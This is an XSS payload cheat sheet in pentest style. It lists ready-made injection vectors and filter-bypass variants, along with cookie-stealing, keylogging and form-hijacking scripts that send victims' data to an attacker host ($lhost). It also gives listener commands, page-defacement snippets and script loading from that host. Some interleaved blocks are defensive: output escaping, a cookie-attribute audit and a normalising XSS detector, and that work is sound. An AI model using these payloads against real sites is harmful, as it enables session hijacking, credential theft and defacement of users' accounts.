# Cross-Site Scripting (XSS)

## XSS Types

### Quick Check (One-liner)

```bash
# Test basic XSS vectors
for payload in "<script>alert(1)</script>" "<img src=x onerror=alert(1)>" "<svg onload=alert(1)>"; do echo "$payload"; done
```

### Reflected XSS

- Payload is included in the request and reflected in the response
- Not persistent, requires victim to click malicious link

### Stored XSS

- Payload is stored on the server (database, comments, etc.)
- Persistent, affects all users who view the content

#### Stored XSS Payloads (Comments, Profiles, Posts)

```html
<script>alert('XSS')</script>
<img src=x onerror="alert('Stored XSS')">
<svg onload="alert('Stored XSS')">
```

#### Fetch Sensitive Data with Credentials

```html
<img src=x onerror="fetch('/secret/flag.txt',{credentials:'include'}).then(r=>r.text()).then(t=>alert(t)).catch(e=>alert('err:'+e))">
```

#### Exfiltrate Data to Attacker Server

```html
<img src=x onerror="fetch('/api/user',{credentials:'include'}).then(r=>r.text()).then(t=>fetch('http://$lhost/?data='+btoa(t)))">
<script>fetch('/admin/config',{credentials:'include'}).then(r=>r.json()).then(d=>navigator.sendBeacon('http://$lhost/exfil',JSON.stringify(d)))</script>
```

#### Session Hijacking via Stored XSS

```html
<script>fetch('http://$lhost/steal?cookie='+document.cookie)</script>
<img src=x onerror="new Image().src='http://$lhost/?c='+document.cookie">
```

### DOM-Based XSS

- Payload is executed via client-side JavaScript
- Never sent to the server
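The defensive counterpart to the stored and DOM-based cases above, as an added example that is not part of this cheat sheet: context-aware output encoding so that user-controlled text renders as inert text, plus a URL scheme allow-list, because escaping alone does nothing against a `javascript:` link. The `renderComment*` functions, `safeUrl` and the sample comment are assumptions made for this illustration.

```javascript
// Added example (not from this cheat sheet): context-aware output encoding so
// the stored and DOM payloads above render as inert text. Runs in Node.js.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escape user data for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Escaping alone does not help in a URL context: javascript: and data: links
// survive escapeHtml untouched, so allow-list the scheme instead.
function safeUrl(url) {
  const u = String(url).trim();
  if (/^(\/(?!\/)|#|\?)/.test(u)) return u;     // relative path, fragment or query
  if (/^https?:\/\//i.test(u)) return u;        // absolute http(s) only
  return 'about:blank';                         // anything else is neutralised
}

// Vulnerable pattern: user-controlled strings concatenated straight into markup.
function renderCommentUnsafe(author, body, link) {
  return `<div class="comment" data-author="${author}"><p>${body}</p>` +
         `<a href="${link}">profile</a></div>`;
}

// Hardened pattern: every interpolation point is encoded for its context.
function renderCommentSafe(author, body, link) {
  return `<div class="comment" data-author="${escapeHtml(author)}"><p>${escapeHtml(body)}</p>` +
         `<a href="${escapeHtml(safeUrl(link))}">profile</a></div>`;
}

// Constructed sample: payloads from this page submitted as a stored comment.
// In the browser the same rule applies to DOM sinks: assign user data with
// element.textContent, never element.innerHTML.
const SAMPLE = {
  author: 'bob',
  body: "<img src=x onerror=\"alert('Stored XSS')\">",
  link: "javascript:alert('XSS')",
};

function demo() {
  return { unsafe: renderCommentUnsafe(SAMPLE.author, SAMPLE.body, SAMPLE.link),
           safe: renderCommentSafe(SAMPLE.author, SAMPLE.body, SAMPLE.link) };
}
```

`demo().unsafe` reflects the payload as live markup; `demo().safe` contains only the entity-encoded text and an `about:blank` link.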

## Basic Payloads

```html
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
<script>print()</script>
```

### HTML Tag Based

```html
<img src=x onerror=alert('XSS')>
<img src="" onerror=alert(window.origin)>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<marquee onstart=alert('XSS')>
<video src=x onerror=alert('XSS')>
<audio src=x onerror=alert('XSS')>
<details open ontoggle=alert('XSS')>
<iframe src="javascript:alert('XSS')">
```

### Event Handlers

```html
<div onmouseover="alert('XSS')">Hover me</div>
<a href="#" onclick="alert('XSS')">Click me</a>
<form action="javascript:alert('XSS')"><input type=submit>
```

### Without Parentheses

```html
<script>alert`XSS`</script>
<img src=x onerror=alert`XSS`>
```

### Plaintext Tag

```html
<plaintext>
```

## Cookie Stealing

### Basic Cookie Grabber

```html
<script>fetch('http://$lhost/?cookie=' + document.cookie);</script>
<script>new Image().src="http://$lhost/?c="+document.cookie;</script>
<script>document.location='http://$lhost/?c='+document.cookie;</script>
```

### Base64 Encoded

```html
<script>fetch('http://$lhost/?cookie=' + btoa(document.cookie));</script>
```

### Image Tag

```html
<img src=x onerror="this.src='http://$lhost/?c='+document.cookie">
```

### Setup Listener

```bash
python3 -m http.server 80
nc -lvnp 80
```
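Every grabber in this section reads `document.cookie`, which only works when the session cookie lacks `HttpOnly`. As an added example (not part of this cheat sheet), a small audit of `Set-Cookie` headers for the attributes that blunt these payloads; `parseSetCookie`, `auditSetCookie`, the `SESSION_NAME` heuristic and the sample headers are assumptions made here.

```javascript
// Added example (not from this cheat sheet): audit a Set-Cookie header for the
// attributes that blunt the document.cookie exfiltration shown above.
// Sample headers are constructed.

// Parse "name=value; Attr; Attr=val" into a cookie object; attribute names are
// case-insensitive per RFC 6265, so keys are lower-cased.
function parseSetCookie(header) {
  const [pair, ...attrs] = String(header).split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).trim().toLowerCase();
    if (key) cookie.attrs[key] = i === -1 ? true : a.slice(i + 1).trim();
  }
  return cookie;
}

// Heuristic (assumption): names that usually carry a session or auth secret.
const SESSION_NAME = /sess|sid|token|auth/i;

// Returns a list of findings; an empty list means the cookie is hidden from
// script (HttpOnly) and kept off plaintext and cross-site requests.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (SESSION_NAME.test(c.name) && !c.attrs.httponly) {
    findings.push(`${c.name}: missing HttpOnly, readable via document.cookie`);
  }
  if (!c.attrs.secure) findings.push(`${c.name}: missing Secure`);
  const sameSite = String(c.attrs.samesite || '').toLowerCase();
  if (!sameSite) findings.push(`${c.name}: missing SameSite`);
  else if (sameSite === 'none' && !c.attrs.secure) findings.push(`${c.name}: SameSite=None requires Secure`);
  if (c.name.startsWith('__Host-') && (!c.attrs.secure || c.attrs.path !== '/' || 'domain' in c.attrs)) {
    findings.push(`${c.name}: __Host- prefix requires Secure, Path=/ and no Domain`);
  }
  return findings;
}
```

`HttpOnly` stops the cookie grabbers but not the credentialed `fetch` payloads in the Stored XSS section, which ride the browser's own cookie jar; those need the injection itself fixed and a Content-Security-Policy that restricts `connect-src` and `img-src`.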

## Keylogger

### Basic Keylogger

```html
<script>
document.onkeypress = function(e) {
    fetch('http://$lhost/log?key=' + e.key);
}
</script>
```

### Form Hijacking

```html
<script>
document.forms[0].onsubmit = function() {
    fetch('http://$lhost/log?data=' + btoa(new FormData(this)));
}
</script>
```

## Filter Bypass

### Case Variation

```html
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>
<sCrIpT>alert(1)</ScRipt>
```

### Encoding

```html
<!-- URL Encoding -->
%3Cscript%3Ealert('XSS')%3C/script%3E

<!-- HTML Entity Encoding -->
&lt;script&gt;alert('XSS')&lt;/script&gt;

<!-- Unicode Encoding -->
<script>\u0061lert('XSS')</script>
```

### Breaking Tags

```html
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<<script>script>alert('XSS')</script>
```

### Without Script Tags

```html
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<body/onload=alert('XSS')>
```

### JavaScript Protocol

```html
<a href="javascript:alert('XSS')">Click</a>
<iframe src="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">
```

### Data Protocol

```html
<a href="data:text/html,<script>alert('XSS')</script>">Click</a>
<object data="data:text/html,<script>alert('XSS')</script>">
```

### SVG

```html
<svg><script>alert('XSS')</script></svg>
<svg onload="alert('XSS')">
<svg><image href="x" onerror="alert('XSS')"/></svg>
```

### Null Bytes

```html
<scri%00pt>alert('XSS')</script>
```
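The bypasses in this section all target filters that match one encoding or run one stripping pass. As an added example (not part of this cheat sheet), a demonstration of why a single-pass `<script>` strip fails against the Breaking Tags payload, and a normalise-then-inspect check of the kind a WAF rule or log review can use; `naiveStripScript`, `stripUntilStable`, `normalize`, `looksLikeXss` and the `SUSPICIOUS` patterns are assumptions made here, and the inputs are the payloads listed above.

```javascript
// Added example (not from this cheat sheet): why a one-pass blacklist fails
// against the bypasses above, and a normalise-then-inspect check suited to a
// WAF rule or log review. Sample inputs are payloads from this page.

// The kind of filter the "Breaking Tags" payloads are written to defeat.
function naiveStripScript(input) {
  return input.replace(/<\/?script>/gi, '');
}

// Re-apply a strip function until the output stops changing, so that
// <scr<script>ipt> cannot reassemble into <script> after one pass.
function stripUntilStable(input, strip) {
  let prev, cur = String(input);
  do { prev = cur; cur = strip(cur); } while (cur !== prev);
  return cur;
}

// Canonicalise the encodings this page lists: percent-encoding, HTML entities,
// JS \uXXXX escapes, null bytes and mixed case. Decode before matching.
function normalize(input) {
  let s = String(input);
  s = s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/&#(\d+);/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
  s = s.replace(/&lt;/gi, '<').replace(/&gt;/gi, '>').replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
  s = s.replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/\0/g, '');
  return s.toLowerCase();
}

// Signals that a normalised value carries markup seen in this page's payloads.
// Treat a hit as a reason to log, block or escape, not as proof of exploitation.
const SUSPICIOUS = [
  /<\s*(script|svg|iframe|object|img|video|audio|body|details|marquee|plaintext)\b/,
  /\bon[a-z]+\s*=/,                 // inline event handler: onerror=, onload=, ...
  /\bjavascript\s*:/,               // javascript: URL scheme
  /\bdata\s*:\s*text\/html/,        // data: URL carrying HTML
];

function looksLikeXss(input) {
  const n = normalize(input);
  return SUSPICIOUS.some((re) => re.test(n));
}
```

Normalisation is what makes the detector robust; the same patterns run over the raw input miss every encoded and null-byte variant above.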

## DOM Manipulation

### Change Background

```html
<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "https://example.com/image.svg"</script>
```

### Change Title

```html
<script>document.title = 'Hacked'</script>
```

### Replace Body Content

```html
<script>document.getElementsByTagName('body')[0].innerHTML = 'Hacked!'</script>
<script>document.body.innerHTML = '<h1>Hacked!</h1>'</script>
```

### Remove Elements

```html
<script>document.getElementById('login-form').remove();</script>
<script>document.querySelector('.password').remove();</script>
```

### Redirect

```html
<script>window.location = 'http://$lhost/'</script>
<script>document.location.href = 'http://$lhost/'</script>
```

### Load External Script

```html
<script src="http://$lhost/script.js"></script>
```

## Payload Cheat Sheet

| Payload | Description |
|---------|-------------|
| `<script>alert('XSS')</script>` | Basic XSS |
| `<img src=x onerror=alert('XSS')>` | Image error handler |
| `<svg onload=alert('XSS')>` | SVG onload |
| `javascript:alert('XSS')` | JavaScript protocol |
| `<script>fetch('url?c='+document.cookie)</script>` | Cookie stealing |
| `<plaintext>` | Break page rendering |
| `<script>document.location='url'</script>` | Redirect |

## 📚 See Also

- Related Web Attacks
- Defensive & Testing